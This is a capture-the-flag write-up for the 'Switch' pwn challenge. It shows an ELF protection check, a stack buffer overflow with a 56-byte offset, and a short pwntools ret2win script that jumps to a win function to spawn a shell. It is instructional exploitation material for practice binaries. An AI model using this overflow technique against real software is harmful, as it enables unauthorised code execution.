CSC2023 - [Pwn] - Switch
Challenge Description
Some sort of switching is possible. Don't know where it is possible.
Solution
First of all, we check the binary's protections.
NX is enabled, so we cannot execute shellcode on the stack.
The good news is that PIE is disabled, so function addresses are fixed and we can jump to other functions using the ret2win technique.
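The protection check above can be reproduced without checksec by reading two things from the ELF itself: the PT_GNU_STACK program header (NX is on when its flags lack PF_X) and e_type (ET_DYN indicates a PIE). The following is an added example, not code from the writeup; it builds a constructed minimal ELF64 image in memory rather than reading the real challenge binary, and uses the e_type heuristic for PIE.

```python
import struct

ET_EXEC = 2
ET_DYN = 3            # a PIE executable is linked as ET_DYN
PT_GNU_STACK = 0x6474E551
PF_X = 0x1            # executable flag in p_flags

def elf_protections(data: bytes) -> dict:
    """Report NX and PIE status for a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    # Linux treats a missing PT_GNU_STACK header as an executable stack,
    # so NX is only reported when the header is present without PF_X.
    nx = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags = struct.unpack_from("<II", data, off)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {"nx": nx, "pie": e_type == ET_DYN}

def build_sample_elf(e_type: int, stack_flags: int) -> bytes:
    """Constructed sample: ELF64 header plus one PT_GNU_STACK phdr (not a runnable binary)."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)   # 64-bit, LE, version 1
    ehdr = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        e_type, 0x3E, 1, 0,   # e_type, e_machine (x86-64), e_version, e_entry
        64, 0, 0,             # e_phoff (right after the header), e_shoff, e_flags
        64, 56, 1,            # e_ehsize, e_phentsize, e_phnum
        64, 0, 0,             # e_shentsize, e_shnum, e_shstrndx
    )
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0x10)
    return ehdr + phdr

if __name__ == "__main__":
    # Same combination as the challenge binary: NX on (RW stack), no PIE.
    print(elf_protections(build_sample_elf(ET_EXEC, 0x6)))
```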
Let's run the binary and check its behaviour.
It takes input from the user and manipulates their age.
Let's give it a large input to check whether there is a buffer overflow.
When we give it a large input, a segmentation fault occurs, which confirms the buffer overflow. At this point we need to find the offset after which we overwrite the return address.
The offset is 56.
Next we check the other functions in the binary to find one we can jump to.
Let's look at the win function.
It contains an execve syscall that takes /bin/sh as its first argument in rdi, which shows that it would directly give us a shell.
So we have everything we need to write a script that gets a shell.
Script
from pwn import *
elf = context.binary = ELF('./switchpwn')   # no PIE, so elf.sym.win is a fixed address
io = process()
payload = cyclic(56) + pack(elf.sym.win)    # 56 bytes of padding, then the return address
io.sendline(payload)
io.interactive()
Shell
Finally, we got a shell.
Writeups 2023 © RootxRAN.